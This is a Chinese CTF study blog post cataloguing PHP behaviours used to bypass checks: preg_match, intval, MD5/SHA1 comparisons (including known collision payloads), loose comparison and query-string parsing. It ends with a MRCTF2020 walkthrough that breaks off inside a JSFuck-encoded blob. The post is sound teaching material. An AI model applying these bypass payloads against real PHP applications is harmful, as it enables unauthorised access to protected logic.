CTF中常用PHP特性总结
<h1 id="ctf中常用php特性总结">CTF中常用PHP特性总结</h1><h2 id="1preg_match正则匹配函数相关">1.preg_match(正则匹配函数)相关</h2>
<p>应该说在接触ctf的web题目过程中,我们不得不于这位朋友打交道,无论是在一些套娃娱乐题,还是代码审计的0day漏洞中,我们都要于这位朋友'过过招'。就我个人而言,在一开始打ctf题的时候最先接触的就是这个函数,也是一开始最让我头疼的,所以就想着把当前题目中遇到的相关的绕过解法总结一下,以便日后参考!</p>
<h3 id="预备知识">预备知识:</h3>
<p>基本语法:</p>
<pre><code class="language-php">int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] )
参数说明:
$pattern: 要搜索的模式,字符串形式。
$subject: 输入字符串。
$matches: 如果提供了参数matches,它将被填充为搜索结果。 $matches将包含完整模式匹配到的文本, $matches 将包含第一个捕获子组匹配到的文本,以此类推。
$flags:flags 可以被设置为以下标记值:
PREG_OFFSET_CAPTURE: 如果传递了这个标记,对于每一个出现的匹配返回时会附加字符串偏移量(相对于目标字符串的)。 注意:这会改变填充到matches参数的数组,使其每个元素成为一个由 第0个元素是匹配到的字符串,第1个元素是该匹配字符串 在目标字符串subject中的偏移量。
offset: 通常,搜索从目标字符串的开始位置开始。可选参数 offset 用于 指定从目标字符串的某个未知开始搜索(单位是字节)。
</code></pre>
<p>有时候我们会遇到它的参数奇奇怪怪的看不懂,这时候我们可以去百度一下参数的含义或者是推荐一下这个网站实践一下:</p>
<p><img src="https://img2023.cnblogs.com/blog/3181170/202305/3181170-20230517204513865-81151992.png" alt="" loading="lazy"></p>
<p>正则表达式在线测试工具:https://c.runoob.com/front-end/854/</p>
<p>那么有了这些基础知识后,就让我们正式探索preg_match的世界吧。</p>
<h3 id="1数组绕过">(1)数组绕过</h3>
<pre><code class="language-php">if(preg_match("//", $num)){
die("no no no!");
}
else(intval($num)){
echo $flag;
}
</code></pre>
<p>看下上述代码,我们要想得到flag,就要赋值num为数字,但是正则匹配又过滤了数字,所以要怎么绕过呢?-----可以采用数组绕过!</p>
<p><strong>原理:preg_match第二个参数subject要求是字符串,如果传入数组时会返回false,则不会进入if语句</strong></p>
<p>所以可以构造<strong>payload:num[]=2</strong></p>
<h3 id="20a换行符绕过">(2)%0a换行符绕过</h3>
<pre><code class="language-php">先来看一个正则表达式:preg_match(’/^gxngxngxn$/’)**
//^和$字符用来匹配字符串的开始和结束,也就是说这个表达式要求我们必须是'gxngxngxn'这个字符串开始和结束。
</code></pre>
<p>那么遇到类似的情况,就可以采用%0a换行符绕过。</p>
<p><img src="https://img2023.cnblogs.com/blog/3181170/202305/3181170-20230517204540103-186476355.png" alt="" loading="lazy"></p>
<p>看上述代码,需要我们传参gxn=gxngxngxn,但是又不能赋值gxngxngxn给gxn,这很明显是个矛盾,这就需要我们用%0a去绕过正则匹配。<strong>payload:gxn=gxngxngxn%0a</strong></p>
<p><img src="https://img2023.cnblogs.com/blog/3181170/202305/3181170-20230517204557921-930205924.png" alt="" loading="lazy"></p>
<h3 id="3pcre回溯次数限制">(3)PCRE回溯次数限制</h3>
<p>这个单独拿出来讲的话又可以另写一篇文章了,就简单的简述一下吧!</p>
<pre><code>标志性的是它的贪婪匹配:
preg_match('/<\?.*[(`;?>].*/is')
所以当我们在题目中看到过滤了一大堆字符,几乎没法rce时,又有/.*这个标志时,可以优先考虑回溯绕过。
大概会回溯了一百万次,我们利用这个来构造payload进行rce。
具体的可以看p神(yyds!)的文章:https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
例题:middlerce
他们的exp大同小异,可以积累下来,到时候再遇到时只需要改下数据即可。
</code></pre>
<h3 id="4总结">(4)总结</h3>
<p>正则匹配的先总结到这里吧,以后有遇到新的会再补充的!</p>
<h2 id="2intval函数相关">2.intval函数相关</h2>
<p>又是一个诡计多端的函数呢!(bushi</p>
<h3 id="预备知识-1">预备知识:</h3>
<p>定义:用于获取变量的整数值;通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。</p>
<p>基本语法:</p>
<pre><code>int intval ( mixed $var [, int $base = 10 ] )
参数说明:
$var:要转换成 integer 的数量值。
$base:转化所使用的进制。
如果 base 是 0,通过检测 var 的格式来决定使用的进制:
如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,
如果字符串以 "0" 开始,使用 8 进制(octal);否则,
将使用 10 进制 (decimal)。
</code></pre>
<p>实例:</p>
<pre><code class="language-php">
<?php
echo intval(42); // 42
echo intval(4.2); // 4
echo intval('42'); // 42
echo intval('+42'); // 42
echo intval('-42'); // -42
echo intval(042); // 34
echo intval('042'); // 42
echo intval(1e10); // 1410065408
echo intval('1e10'); // 1
echo intval(0x1A); // 26
echo intval(42000000); // 42000000
echo intval(420000000000000000000); // 0
echo intval('420000000000000000000'); // 2147483647
echo intval(42, 8); // 42
echo intval('42', 8); // 34
echo intval(array()); // 0
echo intval(array('foo', 'bar')); // 1
?>
</code></pre>
<p>以上就是一些intval的基础知识。</p>
<h3 id="1进制转换绕过">(1)进制转换绕过</h3>
<pre><code class="language-php">if($num==="4476"){
die("no no no!");
}
if(intval($num,0)===4476){
echo $flag;
}
else{
echo intval($num,0);
}
</code></pre>
<p>这种情况,就看他转换为八进制或者十六进制来绕过。</p>
<p>0b?? : 二进制<br>
0??? : 八进制<br>
0X?? : 十六进制</p>
<p><strong>payload:num=0x117c|| num=010574</strong></p>
<p>再看看下面这种情况:</p>
<pre><code>if($num==4476){
die("no no no!");
}
if(preg_match("//i", $num)){
die("no no no!");
}
if(intval($num,0)==4476){
echo $flag;
}
</code></pre>
<p>这里就是正则匹配过滤了字母,所以不能用十六进制了,可以转换为八进制.</p>
<p><strong>payload:num=010574</strong></p>
<h3 id="2科学计数法绕过">(2)科学计数法绕过</h3>
<pre><code class="language-php">if($num==4476){
die("no no no!");
}
if(intval($num,0)==4476){
echo $flag;
}
</code></pre>
<p>还是拿这个举例,除了进制转换外,还可以使用科学计数法绕过。</p>
<p>intval()int函数如果 b a s e 为 0 则 base为0则 base为0则var中存在字母的话遇到字母就停止读取 但是e这个字母比较特殊,可以在PHP中表示科学计数法。<br>
<strong>payload:num=4476e0</strong></p>
<h3 id="3小数点绕过">(3)小数点绕过</h3>
<pre><code>
if($num==="114514"){
die("no no no!");
}
if(preg_match("//i", $num)){//禁用字母
die("no no no!");
}
if(!strpos($num, "0")){ //禁止0开头
die("no no no!");
}
if(intval($num,0)===114514){
echo $flag;
}
</code></pre>
<p>像上诉这个就不能使用进制转换了,那么可以使用传值小数,intval()会帮我们转换为整型,以此达到绕过的目的。</p>
<p><strong>payload:num=114514.114514</strong></p>
<h3 id="总结">总结</h3>
<p>intval函数的考点相对比较简单,目前也就遇到了这些,以后如果碰到有趣的再补充</p>
<h2 id="3md5绕过相关">3.MD5绕过相关</h2>
<h3 id="1数组绕过-1">(1)数组绕过</h3>
<p>原理:MD5无法处理数组,如果传入数组则返回NULL,两个NULL是相等的。</p>
<p>看下面代码:</p>
<pre><code class="language-php">if ($_GET['a'] != $_GET['b']){
if (md5($_GET['a']) === md5($_GET['b'])){
echo $flag;
}
else{
print 'Wrong.';
}
}
</code></pre>
<p>分析:需要我们以get的形式传入两个参数a和b,并且md5加密后要相等,那么这里我们可以采用传入两个数组的方式,让他们返回值为NULL,以此达到绕过的目的。</p>
<p><strong>payload:a[]=1&b[]=1</strong></p>
<h3 id="2强制类型转换后绕过">(2)强制类型转换后绕过</h3>
<p>原理:md5弱比较,使用了强制类型转换后不再接收数组</p>
<p>看下面代码:</p>
<pre><code class="language-php">$a=(string)$a;
$b=(string)$b;
if(($a!==$b) && (md5($a)==md5($b)) ){
echo $flag;
}
</code></pre>
<p>这里因为事先对两个参数都进行了强制类型转换,所以就不能传参数组达到绕过的目的了,因为是弱比较,所以可以采用科学计数法的方式绕过,即找到两个不同的值,让他们md5后的值都是以0e开头的。这个遇到了可以去网上一搜一大堆,这里就列举几个。</p>
<p><strong>payload:a=QNKCDZO&b=240610708</strong></p>
<h3 id="3自身前后md5相等绕过">(3)自身前后md5相等绕过</h3>
<p>看下面这个代码:</p>
<pre><code class="language-php">$md5=$_GET['md5']
$md5 == md5($md5)
</code></pre>
<p>分析:需要我们传参md5,使它的值与md5加密后相等,于是我们需要找一个0e开头,并且md5后还是以0e开头的值,这里直接例举几个,积累下来以后遇到直接用就行。</p>
<p><strong>payload:md5=0e215962017</strong></p>
<h3 id="4md5强碰撞">(4)md5强碰撞</h3>
<p>强制类型转换和强相等会擦碰出怎样的火花呢?(妈妈生的!)</p>
<p>看下面代码:</p>
<pre><code class="language-php">$a=(string)$a;
$b=(string)$b;
if(($a!==$b) && (md5($a)===md5($b)) ){
echo $flag;
}
</code></pre>
<p>这边强制类型转换+强相等,那么前面的科学计数法绕过和数组绕过就通通失效了,这时候就需要进行md5强碰撞来找到两个值,这里直接就放出来两个值,积累下来就行。</p>
<p><strong>payload:a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2</strong></p>
<h3 id="5补充">(5)补充</h3>
<p>写到这突然想起与MD5类似的还有一个sha1这种,MD5考腻了就会换成sha1加密,但是解法还是差不多的,它们两个特性也差不多,无非就是数组绕过和sha1强碰撞,类似上诉md5记录的题型。</p>
<p>sha1强制类型转换:</p>
<pre><code>payload:
aaroZmOk
aaK1STfY
aaO8zKZF
aa3OFF9m
</code></pre>
<p>这里也给出sha1强碰撞的payload,积累下来以备不时之需;</p>
<p><strong>payload:a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1</strong></p>
<h3 id="6总结">(6)总结</h3>
<p>md5的考点也就那几个,常见于套娃题中,比较好玩,有兴趣的可以去深入学习一下,目前就先记录这些,以后遇到新型的考点再记录下来,哈哈哈!</p>
<h2 id="4弱类型比较绕过">4.弱类型比较绕过</h2>
<h3 id="预备知识-2">预备知识:</h3>
<p>php中有两种比较的符号 == 与 ===</p>
<p>=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较</p>
<p>== 在进行比较的时候,会先将字符串类型转化成相同,再比较</p>
<p>例如:</p>
<pre><code>admin == 0//true(在进行弱比较时,会先将admin这个字符串进行强制类型转换成数值,而字符串转换成数值后为0)
123admin == 123 //true
admin123 == 0 //true
(当有数字和字母混合组成的字符串进行弱比较,强制类型转换后若数字在前则转换为那个数值,若是字母在前,则为0)
0e12354458 == 0e8898485 //true(带有e的为科学技术法,两边比较时进行类型转换后数值都为0,故相等)
查阅php手册可以找到官方的结束:
当一个字符串欸当作一个数值来取值,其结果和类型如下:如果该字符串没有包含'.','e','E'并且其数值值在整形的范围之内
该字符串被当作int来取值,其他所有情况下都被作为float来取值,该字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值为0。
</code></pre>
<p>以下放出一张表格,是php的官方比较表格,可供参考:</p>
<p><img src="https://img2023.cnblogs.com/blog/3181170/202305/3181170-20230517204725508-2049933938.png" alt="" loading="lazy"></p>
<p>链接:PHP: PHP 类型比较表 - Manual</p>
<p>好了,下面我们来看一些常见的弱比较问题吧!</p>
<h3 id="1简单的弱比较">(1)简单的弱比较</h3>
<pre><code class="language-php"><?php
$a=$_GET['gxn'];
if(!is_numeric($a)){
if($a == 114514){
echo 'you are great';
}
}
?>
</code></pre>
<p>看上述代码,一道最简单的弱比较问题,要求我们传入的参数不能为数字,但是后面又要我们等于数字,这时候就是发挥弱比较的特性的时候了。只需要传入<strong>payload:gxn=114514a</strong></p>
<p><img src="https://img2023.cnblogs.com/blog/3181170/202305/3181170-20230517204741281-1505633269.png" alt="" loading="lazy"></p>
<h3 id="2总结">(2)总结</h3>
<p>其实弱比较问题在我目前遇到的单独考察的不太多,一般都是与其他函数结合起来考察进行绕过。例如像md5(),intval()等等,这些前面都有讲到,这里也就不再赘述了,若是遇到了不熟悉的函数一起考察的话,我们一般都是先去百度这个函数的用法,然后依据用法进行绕过,其实这些都是简单的入门问题捏~!</p>
<h2 id="5php字符串解析特性">5.php字符串解析特性</h2>
<h3 id="预备知识-3">预备知识:</h3>
<p>PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:</p>
<p>1)删除空白符</p>
<p>2)将某些字符([,+,.)等等转换为下划线(包括空格)</p>
<p>我们可以看张<strong>典中典</strong>老图:</p>
<p><img src="https://img2023.cnblogs.com/blog/3181170/202305/3181170-20230517204753959-1827760493.jpg" alt="" loading="lazy"></p>
<p>可以看到在字符串中间的某些特殊符号是被解析成了下划线了,而这也是以后我们会遇到的常见考点之一,下面让我们一起来康康吧:</p>
<h3 id="1康康题目">(1)康康题目</h3>
<p><img src="https://img2023.cnblogs.com/blog/3181170/202305/3181170-20230517204809825-444601696.png" alt="" loading="lazy"></p>
<p>可以看到需要我们传入变量名为a_b_c_d的数据,但是在php解析中会将某些下划线解析成空格导致判定失败,于是我们可以采用其他字符代替的方法来进行绕过,如上图所示,我们传入<strong>payload:a+b[c_d=gxngxngxn</strong>,达到绕过的目的。</p>
<h3 id="2总结-1">(2)总结</h3>
<p>对于这些字符串解析特性造成的漏洞,我一般都在一些比较简单的娱乐题中遇到过,考来考去也就这一些,总结下来够用了。</p>
<h2 id="6结束--------以一道例题mrctf2020套娃收尾吧">6.结束--------以一道例题[套娃]收尾吧!</h2>
<p>在BUU上捏~~~~~~~~~</p>
<h3 id="第一层">第一层:</h3>
<p>点开靶机,进入首页面,话不多说,直接看页面原代码,发现密码(bushi:</p>
<pre><code class="language-php">//1st
$query = $_SERVER['QUERY_STRING']; //获取查询语句,简要来说是获取我们get传参的内容。
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
} //过滤了以url编码形式绕过下划线捏。
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}//传参b_u_p_t值不为23333但又必须首尾是23333.
</code></pre>
<p>这里运用了我们之前讲到的两种绕过(<strong>php字符串解析特性</strong>和<strong>正则匹配绕过</strong>),于是我们可以用’+‘来代替下划线,用%0a来绕过这种形式的正则匹配。</p>
<p><strong>payload:?b+u+p+t=23333%0a</strong></p>
<p>传入后,得到提示下一层在secrettw.php,于是进入下一层:</p>
<p>还是老样子,典中典之查看页面源代码,发现了一串justfuck加密的字符:</p>
<p>[][(![]</p>
<pre><code class="language-justfuck">+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[